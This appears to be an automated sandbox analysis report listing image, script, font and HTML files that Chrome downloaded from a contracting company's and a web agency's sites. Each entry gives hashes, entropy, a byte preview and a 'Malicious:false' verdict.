                                              Preview:.goog-inline-block{position:relative;display:-moz-inline-box;display:inline-block}* html .goog-inline-block{display:inline}*:first-child+html .goog-inline-block{display:inline}.recaptcha-checkbox{border:none;font-size:1px;height:28px;margin:4px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom}.recaptcha-checkbox-border{-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;background-color:#fff;border:2px solid #c1c1c1;font-size:1px;height:24px;position:absolute;width:24px;z-index:1}.recaptcha-checkbox-borderAnimation{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFQAAANICAYAAABZl8i8AAAAIGNIUk0AAHomAACAhAAA+gAAAIDoAAB1MAAA6mAAADqYAAAXcJy6UTwAAAAGYktHRAD/AP8A/6C9p5MAAHq9SURBVHja7Z15fFTl9f/fd9ZM9n1PgCyEXSSRNYKCgAuiIipuVSuudavV1tq6W/WrtnWrrZbWDZUqUqUoCoIEQhBI2JesELKvM9mTWe7c3x83d5xAlkky8fv92ft5vfKC19znOWfuZ571POc5B1SoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKHifwGCRqsTNFrdj6VPq9XqtNofT9+wvutQyEyad8t9IaPPntFUd
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1000x750, components 3
                                              Category:dropped
                                              Size (bytes):465135
                                              Entropy (8bit):7.9865775065261575
                                              Encrypted:false
                                              SSDEEP:12288:aHLDQmOAhW1yD5ndsUz+uA4MdHFNy0/O8xXTH:68e7D5ndOWMdHDmAXT
                                              MD5:32B1CD58F62CFAD85F42E83AF7554F20
                                              SHA1:3EF018A6027AB027B4A5177AC6C71D8A669FE83A
                                              SHA-256:FDBD46BAD8DF1A359F047B3441EE3C51037068750EB380B0EB7A5FEB8EB34D82
                                              SHA-512:83B7DC31D85B688EEA88444ED5B8B2EFA93BB16469DFF91F73E76637F21A6431B477D2991E6DD21169D6193F3F73F01CAFF3F74FF695323113CCD07FC94F080E
                                              Malicious:false
                                              Reputation:low
                                              Preview:......Exif..II*.................Ducky.......d.....bhttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="B3D2AB1016602B7C6B7EEECC2B8EE85A" xmpMM:DocumentID="xmp.did:DC3562EB940D11EDAE93EE0BCB8DB905" xmpMM:InstanceID="xmp.iid:DC3562EA940D11EDAE93EE0BCB8DB905" xmp:CreatorTool="S908EXXU2BVKB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4e1e01a6-f8cf-ab46-8c3e-158dc8be362f" stRef:documentID="xmp.did:4e1e01a6-f8cf-ab46-8c3e-158dc8be362f"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...HPhotoshop 3.0.8BIM..........Z...%G........8BIM.%............x/4b4.Xw....&Adobe.d
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):6837
                                              Entropy (8bit):7.959864047003786
                                              Encrypted:false
                                              SSDEEP:96:Dizo56s3rL3xAGVTfVMC8bp8SjOOqRDZNiO4N6VVTe1rH9N78ltxxbYypLwQzzBa:DiuJfh9xfulbp87Oqz48IgSozlwz
                                              MD5:3D243E9AAFFFE83260A1AA57D65B8758
                                              SHA1:D3DC5A2C21886F9509AA922938D7AFC5E9BFEBE1
                                              SHA-256:887DAA665226124AC381E15EDD1926BA60171F33ADEF8A19BC7FDF1A78A84CBC
                                              SHA-512:0C23EF8316BD94D848175174504E96FD3DE357744814523C2FBC4F3A293BBC1F94CA23026F974F1B06709E306BC85E0B2349A9242D108C0BB5076161D14752AC
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE.................................................3B.9@................................(:|..#......../e.....................S...8J...$;...........:=.....S...............CZ....G`......,?xF\....................,j.3N...."O..y.. Aw..A....66.........5J.........N...*.+GJ.....W....../9..%[..................-?)8r...........@X.......%7.................~....................S.........I.....AE..........F_..........."...^..I`...........1........................w..........<=x....@X<........'F......._....g..Lz..........................1..{..A`.............Yp.Um.[s.@U\?d..;.$5..|..._y$..8X...9O..IoR..m..q.........w.......<j.z.........s..6Q.......%../......./.......{......5......m....PA`..$ee...e..[>?^.X)....pIDATh..kPS...s......H 1..B..!..@...f.2.-P`...0Y..(....-....:.....H.Y..3u......u........>'.V2..;!....y....!.~..Ey...L xQ.tDH.:z.....Y...0.o...(..gQ.V@Q*.@ .y<......n...V..>
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 196x61, components 3
                                              Category:downloaded
                                              Size (bytes):2326
                                              Entropy (8bit):7.726565668160658
                                              Encrypted:false
                                              SSDEEP:48:ueXVrHftdtW4iThDhhhqcGoC0JeWTu9SbO5RkZH2+JZ:u2rftbi118ee6SRYWE
                                              MD5:69023E5B2A2040F40A9A4F86EE22CA28
                                              SHA1:A9D5DD8EF335CA4B0A4CBC6A6875797D1230B2D9
                                              SHA-256:8B5EE668094FACCC85C7CA06417E3DE01224CC392F89F10897D762AB6CB6291E
                                              SHA-512:F89462992ADC9AA0BFC77713922FF1F1FF8CA3E6999463AAA284751385B31F479128EDAF38D62A3BE4DC9987E1B74F7F890DC0E115673F61180A35B9F566F5B6
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/images/captcha.jpg
                                              Preview:......JFIF.................................... ..............&...#..../ $'),,,. 152*5(+/)...........)...))))))))))))))))))))))))))))))))))))))))))))))))))......=...."......................................4......................!1.AQ.."aq........2R..Bbr...........................................................?...),..f......].@>..J4....[@.r.j...P..NJ.".?].)aH.........8..i....j.BS..............R...eqx.R.3S..<_...7.2....B.[... 3R.<.Ztq.......I*J.$..;.SHR0[...r..J...*..O..8.\78...c. .JO+....~u...X.7..Y./z.)d.5...I....s...J3......kN.@.sI.qcJ....!......t<..b.P.T.R..[.^.v.4LIU*J\..9...../..WE.......Q..K.Q......$...(..A.>w>...A..Bt9V....O...(,..MA.r.p.Y\..5....`1..*....S2z...X>.\..J.......^..:..AL...\.g.<.[.......$OB.T....w..T.....L...X%.h..kA....k...T.%........+.......~..G..j...Z'.S$.^..8%).-..!.e.-j.....]...."D..N.2Y.g..C....an...B....@Q....q......2.0p..6Q~..`phq..!......| ...J[.~."`M.Om.L.!....=...`j..=......#.|.c .4..e...U."..w...N.k?|....2.....?-..g.c..D+
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (3537)
                                              Category:dropped
                                              Size (bytes):52603
                                              Entropy (8bit):5.316331138717284
                                              Encrypted:false
                                              SSDEEP:1536:yYrF+dXpn0e+99D7FPUzHhbtjFnmFRbdwWRI32nB7PXAlnuhPisfq3ECoe5EzpGS:yYrF+d5n0e+99DJPUzHhbtjFnmFRbdwM
                                              MD5:F0A9F2F65F95B61810777606051EE17D
                                              SHA1:872BF131CB4BEFD0242339F072F2F9B9FBF8019F
                                              SHA-256:9CDF2602AC04F7E2BED582D4299C73D464FC4AB069E3AD5A20EE2B6635A015B8
                                              SHA-512:6823914507BA31E0F61B95CC53F09543C3C14E5530E9EF1B00338FBBD7C25D2E398F5F628DF4ED25D6FF88E0F8BEE506EFE62BA704778BA7CFF09AEC9579D9F0
                                              Malicious:false
                                              Reputation:low
                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var f,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},h="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},ca=ba(this),da=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&h(c,a,{configurable:!0,writable:!0,value:b})}};.da("Symbol",function(a){if(a)return a;var b=function(g,k){this.g=g;h(this,"description",{configurable:!0,writable:!0,value:k})};b.prototype.toStri
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):40342
                                              Entropy (8bit):7.993864125148155
                                              Encrypted:true
                                              SSDEEP:768:hHsb1iFc4JZwXmJlSgZibMwmn8ZyrULBBwU7pIszHa2llz:BsZOJfgm6a8lm8ZyrCBwUzz6+
                                              MD5:6A7F72562B94426A072F5D17FD0D71D5
                                              SHA1:FF574697687D7FADABE9924038F22C47A482C4B1
                                              SHA-256:B6A40F822BF258767EF643704621BBEAE96043D2169065863A4BC21C65AC06D9
                                              SHA-512:C02996F982C7ACDF268BBDC3FF603D853EE3800CFFA46F7C4BC236AD2C148B9A3209EC01D570021BC73D31DC4C7535530B99E00A4F3F9A8CD043A9C616720B7F
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/14/9c27c5ed5390bcab73619e4cc9ae7362.webp
                                              Preview:RIFF....WEBPVP8X..............VP8 .........*....>.t.S)&.0#.y....im..]....@...._.....[.W.|{9.....;...@..j......'._......s...7.v.p.:.8.#{.)O.....Q........i...W......+._.......<.....O....g.O..K...._.)..;..._......Q.....N........................................../..L...l{T*W...c.......<.........7..bxu/uUe.._...k- ...W.DKYi.W....M6....j........:.|.J .(i.-^..h7:.Q....^..==.I....=..*KJ.....:.h..e..N"30.0.....i.M..uq..e}s.d.........;..)m...1A.<..(o.(9..yoSAkV_....Q........_,N.........@..0.S.....M...LZi....t.T'......3H.5}...,..i;..fN1...]...[T..b.:..hr/...S.*J._6;\*...~..V^.)B..|...>...U`t.....0....'...z.%TB.G.....|..>(........%=9Gv...W...9X...%L..Q.(:..o.T......?.....g...e$O.D.,RsW..`U....-.k.$.\2p.T..K.........@]. S&T3.L..|D....5..q)v...J.@....."+..?....Nr....'..}....m.....8..(.Y.}Z...Q{.lx....q.t.<7'04T.Bx...h.3.....q.J.W{.....-@..F...........A{.+..A..../;.".k...7M.F.:..D.x...b..s......[/..h....x....^..L.@..7/.Z.... i..p8..<K.zb..."y.......A.i..+2.>
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):30278
                                              Entropy (8bit):7.862024809612423
                                              Encrypted:false
                                              SSDEEP:384:9UlO6e2+SjgXGuk2Ob7ucWrrVQZUzWG2hRlftajs2omqU0odvi7g9HFob1letEpy:Q+RG12Suc1Mg4jsJHUl1VFob1Yt0fa
                                              MD5:80DAAA59249F997210E703C6519E57F7
                                              SHA1:E1586D20CFA49A007B7EFE195D3C6D246138E1B1
                                              SHA-256:49C5DC1BCD630F5D88B240C65B223082AE408C6D94851C071E57B18117A071F9
                                              SHA-512:79A494992079353D564B60C2D7ACFA08CAE6EF11429900AB38BC705A6D5A98096A4E2844B9FF40B91A6B6D939247CE2BDBB94608649D02B5E0F21C68FAA3C5EB
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/2/642d6ab7cc96f172b2bf039056240259.jpg
                                              Preview:......Exif..II*.................Ducky.......d...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:F8D6A625933D11ED89EBF64F108C6D06" xmpMM:DocumentID="xmp.did:F8D6A626933D11ED89EBF64F108C6D06"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F8D6A623933D11ED89EBF64F108C6D06" stRef:documentID="xmp.did:F8D6A624933D11ED89EBF64F108C6D06"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d...................E...^...vD................................................................................................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):86384
                                              Entropy (8bit):7.9978701531194
                                              Encrypted:true
                                              SSDEEP:1536:7eSt2hLopBoznBqTStFRFfODZ/zlIrLmfOecjKA7u1bdyb0xrAy7giqSIpuov:SSt2VopBoznXFa/zl5Zyu1bAmrr7gzpJ
                                              MD5:17D930533C1832197577D741F2200C41
                                              SHA1:04C72A67385424D3CEB57EC13ED14C8581A27CD0
                                              SHA-256:E6B1F21C0D3081145A68E27D669046EAE07405DCABB17015073F873907A0C8FC
                                              SHA-512:B794011BCF3EBBA724B0F6286F2A58F03AD8817D9AF3BA1070D0FD4DDA07C4D3D58C216DD44D1664FD1A047B3419D8F9F2119479A1DBB06F5A7FA5D2D0318CAF
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFFhQ..WEBPVP8X..............VP8 .P..P....*....>.l.R)%..%......eA..S..j.W.n.p.......'.zj^m......y.$>...... .0o.n.....:v..'..?...`....;.....g.'..._T?.=.~...z......i...........E...y....^..k......P~.?...._.n......_..........o.....y2..r6..+...;.O.....}..o...............N..x.}...._.7.....>.......O..a..._...zO..W..d1{*...J.t..g..%H.QH.MU.y.SK.t3....4.Y..Jg.h.S.oy.....C.|.RSN..}...%A@..pl.:d-."b...P....&...=.......(......U..]...LZ..4.F5N..X[...?........G6u..&.(k...9......r.M..>0..'..I.......N.'Z.P.mQN.$............"..@\K..b.....B...W...l...M@.........fy..f...B....nx/k........^...8.y...~.hF.l9.~im.....n-[^.+X.Q,Gi....#9C..".{257.{......_S1.......V...u.5...@.....{El.......S1F..3C_,C..8...W..;..m.o....A~....C[.;I:@.igKj^@;Yu.].eQ~.O...\..Um9>..P...qQh.n.-...;.sJ2AK!.......m%$..N...^D(Lc.T`.h...G ...r.Z.APc.....[8.....{`..E.V....8.8s.>S.d.G.N.x....`..?.sA.f...I...1t...o.......y^|.k.{.w.V..1h.N..2.uo.]>TZe..7..%..l.o.^.C...C. .he.D....Y...{I.A.Y..8.sn.n.!K
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (1928), with no line terminators
                                              Category:downloaded
                                              Size (bytes):1928
                                              Entropy (8bit):5.279338870681049
                                              Encrypted:false
                                              SSDEEP:48:YozhSHci0CwG54tKjCsvzsaZTSnM+n+HpBKs8wZPayS:3h+0CwG5HjCsrsaZTSnMWMpBKs/YyS
                                              MD5:FFA1C1C1632E8B1EF25AE00ED94385C0
                                              SHA1:D41504626FCBCD03E5B44B4C8F7D8B02D56EA1AF
                                              SHA-256:896688D966DE7F514E72B6C5B156DE3FB6DBFCD61436E6DB46CE3B0E4F52426A
                                              SHA-512:DF18CDE2A7C51BBC3BBB1496291CB8977E3E1D565F7316B85B94719FC4017AB3D3EDF1E18292D8314B902187E3EAC4477F8FF5C585DDB66520FDF7DB223696B0
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/js/counter.js
                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.counterUp=t():e.counterUp=t()}(self,(function(){return(()=>{"use strict";var e={d:(t,n)=>{for(var o in n)e.o(n,o)&&!e.o(t,o)&&Object.defineProperty(t,o,{enumerable:!0,get:n[o]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t),r:e=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})}},t={};e.r(t),e.d(t,{default:()=>n,divideNumbers:()=>r});const n=(e,t={})=>{const{action:n="start",duration:i=1e3,delay:u=16}=t;if("stop"===n)return void o(e);if(o(e),!/[0-9]/.test(e.innerHTML))return;const l=r(e.innerHTML,{duration:i||e.getAttribute("data-duration"),delay:u||e.getAttribute("data-delay")});e._countUpOrigInnerHTML=e.innerHTML,e.innerHTML=l[0]||"&nbsp;",e.style.visibility="visible";const c=function(){e.innerHTML=l.shift
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x640, components 3
                                              Category:dropped
                                              Size (bytes):130131
                                              Entropy (8bit):7.986258348139386
                                              Encrypted:false
                                              SSDEEP:3072:wrf3nezQubDlip2i1+Ill7AimCSoyS5xcpnqvkQ88GOCd5/0jef:SfuUUI2A+IHdxyPT8I5Mjef
                                              MD5:C789973E81975122A5FC0DC894524751
                                              SHA1:1230AA52D2C0C0109A1348ACF846654CDFF918AB
                                              SHA-256:22ACE61CEA8A960B8FD63D79770BC7640B40EEB2C8343D7DF25E6A781A6173BF
                                              SHA-512:3DC1ED643B36BDFC5D70E0837B8686966B0C4C3FF400FFBA7B7FDC73DF2007FF571B02CB0CAE85DF2AB27C096F21930CD6E21A7D44D7330B6AF8F75FF9EBE687
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF...........................................'......'#*" "*#>1++1>H<9<HWNNWmhm................................'......'#*" "*#>1++1>H<9<HWNNWmhm.............."................................................|..5.y...&[Y.^......_...+.....s...wwwB.U{....,.y.Hu'....Ukb.{...'.kQ..7.G....-6.]Z..,.q..q.}_Ks_...z...(.j.fWU...?..~g.PC....3..9^...(c.]/O ....C.'..o".#...5...f.wK}}D.p@..h......Z.....Y...g..>.=t..pZ...z....#...&.U.)..h..w=$....o<...3.@.........UT....W.e..X...D.]9*.q.....|.L.^G..u...\&..._]..y....B.U.......<7.G6H......U3..;j...f"g.&.E.U^....qf. .~..<..........(..}...A.^V_.uF3....=..i....*H.......c\...s..sU.>..4...9........d}.1..*."5..ND.3u.......K-...1.......B{.f..<._........U.0>.1s.0U.,..E...>0:y...b"uY......V.U.k.bG..c.#.W@..g]B.9.....[.9.....*ZL.wv...>..l..<a.\.t4T......[a...$y@.....CO(..^.H..D...'9.....*.....c`3..[.t&.5Te...N......ihhS.&.......<3....3TW....c_...E.@4...9.&.....f.1.TNmYRr2^f.]\..a...0._...=..s[..@J....:.....7
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):13355
                                              Entropy (8bit):7.617070955659662
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwLSHNX8WLwO1MY3LR3XhHRUqxtbzBFpvGlf9RwL3zJLRudDHMn6E1:4YNg7LdWhMeFnxfPp+ZSDJLRgDI6E1
                                              MD5:F337F3B67E73029739AF057838D2CCCA
                                              SHA1:D55059F491CEA5A9244557D1C51792012F9946DB
                                              SHA-256:7982BCCD84264238181AFDC79B2951EF48D40BD6502F21088EF21FE981E1FF9A
                                              SHA-512:742D0011346DBE6489837FA8EA34564ED52BCF101B4ABC53E659F452500F1FD0DC1889FC535F3003A00A7C57CB3DE33F3540B1707E623D7F959D80EA5223F9D2
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/75/9a5fcbacdf6f93eb5e9e1f80b1d29d41.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2000x1500, Scaling: [none]x[none], YUV color, decoders should clamp
                                              Category:dropped
                                              Size (bytes):82006
                                              Entropy (8bit):7.995535530001124
                                              Encrypted:true
                                              SSDEEP:1536:r7rvYNk9ublbCGWpqsyB1K44t2i5G60ExjmbeOI57p4x945ca:r7rrIlbCTqsS1K44txHqaB5tA92
                                              MD5:AC3D0E25CF2223C4024F5D6F09952E55
                                              SHA1:786E38481D3558F437D4B2D4688AFE310A59B22A
                                              SHA-256:73542C28880BB60439844274BA16843C05DC67D8D69647CA30C06150AD89D5AE
                                              SHA-512:18DC4BE2E6C06C8ABA85045CF668B0A0537195765F1A4968B1A71DA1FA11A2C5E23DD132A5DE44FE1BDD4794AC516F287CCEE93205D1350A1438ECBDE23A9E47
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFFN@..WEBPVP8 B@.......*....>Q(.F..!.!P..p..in.._S....9S?0....|......X...g..Y.w..y.;.c.....Or....mj)....G....y..g.y.......Op.....6~..V..E.B......t|C..............r.#.....C...o.?..........?..S.c...k.....s...]......_.....h.+..........g....7.....?{...........^|...}.k.!...7.o.?..r>.?........?...?....i.........[;....KK.!.].....u'WtC.:...I....N..RuwD:...!.].....u'W.N....^...-..RuwD:...!.]......^.z.....N..RuwD:...!.].....u9..!.].....u'WtC.:...I....N..RuwD:...!.].....u4^-..=R..G...iwD:...!.].....u'WtC.:...I....N..RuwD:...!.].....u'WtC.:...I....N..RuwD:...!.].....u.;..I....N..Rv? ...T....I....N..RuwD:...!.].....u'WtC.:...I....N..]..RuwD:...!.].....u'WtC.:...I....N..RuwD:...!.]....tC.|I9.....u'WtC.:...I....N..RuwD:...!.].....u'WtC.:...J.XZ......Z].....u'WtC.:...I....N..RuwD:...!.].....u'cjN..9x..tC.:...I....N..RuwD:.b".Tx.T....I....N..Ruv.........!.].....u'WtC.:...I....|.......KK.!.]......iixd...KK.!.].....u'WtC.:...I....N
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):6775
                                              Entropy (8bit):7.9410302413002904
                                              Encrypted:false
                                              SSDEEP:96:PllcHitlIxv9vk7C1+I4wWHLihk/xZSH5i9mi9HNY1Z+tK+6NEHw45bJdkpoKy/2:UIIHUCD4wa3S11ZAt34oKy/LNivM/M
                                              MD5:4F201692F69A53D8C568BA3AE8EAB67F
                                              SHA1:52ED236129DF6CBEC52C7954A04112C49C79C3FC
                                              SHA-256:CEABC6C2A1F5B3F50CD568401B37AC7567DB9F09876D5A0786EFA7CA99C1028C
                                              SHA-512:5B973E043AE3041969DC45D1CC13727FD4552CAFD265EF8D337365D2415A5BCF6745A340C0CC38A7A1F0457511FD4B3329D62D147E6CC85EDA547A57EA64E062
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/zaiba.png
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                              Category:dropped
                                              Size (bytes):1603
                                              Entropy (8bit):5.2727801090429285
                                              Encrypted:false
                                              SSDEEP:24:hY6svD+6zSU6pedQf3Zvcn1BZdAe1nCr1LTHI5z8x/S8f:3qD+2+pUAew85zsaA
                                              MD5:78FD7C1A980B9162702E6F984A25B7A6
                                              SHA1:E832ABE897CDAA5E36131733AF619F174AD0F9C5
                                              SHA-256:1C5A3539A6FBE5420A519540FF6662EFEACB0BB1B9B8314C74064694A0D52C0B
                                              SHA-512:06B0C9A98D1F6B5BCF81D81574258B7D479579CD80FC51105C58B99263D802EFD64ECF6B5A9A3105C1046FB7EE3F776547E1593436AFC3E6C0820D149C0913BA
                                              Malicious:false
                                              Reputation:low
                                              Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 404 (Not Found)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (1572)
                                              Category:downloaded
                                              Size (bytes):37822
                                              Entropy (8bit):5.561956885982681
                                              Encrypted:false
                                              SSDEEP:768:byayLmTGUHNiScmD4EFFwOYHBCijJtyiVbu:byayLmf
                                              MD5:77A4AE1900D85D0E42BD19C629AB94BF
                                              SHA1:C3E5F3BDEE8A357EA892593B634BD5863961DDEF
                                              SHA-256:DAC6AAB1EAB597A0ECCB552DF2040D9ACF6838755165E5C06BCD9327F683EF11
                                              SHA-512:950A6B2B6A91942085A15A92D736C8B31BE6D66FAB56F153F4F1B71A37B8181EF6F99BFAA9C8560F59809755AFF84DBB9D30B58F75D5A07672D45343A8C4EB24
                                              Malicious:false
                                              Reputation:low
                                              URL:"https://fonts.googleapis.com/css?family=Roboto:300,400,500,700|Google+Sans:400,500,700|Google+Sans+Text:400&lang=en"
                                              Preview:/*. * See: https://fonts.google.com/license/googlerestricted. */./* armenian */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiIUvaYr.woff2) format('woff2');. unicode-range: U+0308, U+0530-058F, U+2010, U+2024, U+25CC, U+FB13-FB17;.}./* bengali */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiAUvaYr.woff2) format('woff2');. unicode-range: U+0951-0952, U+0964-0965, U+0980-09FE, U+1CD0, U+1CD2, U+1CD5-1CD6, U+1CD8, U+1CE1, U+1CEA, U+1CED, U+1CF2, U+1CF5-1CF7, U+200C-200D, U+20B9, U+25CC, U+A8F1;.}./* cyrillic-ext */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_I
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text
                                              Category:downloaded
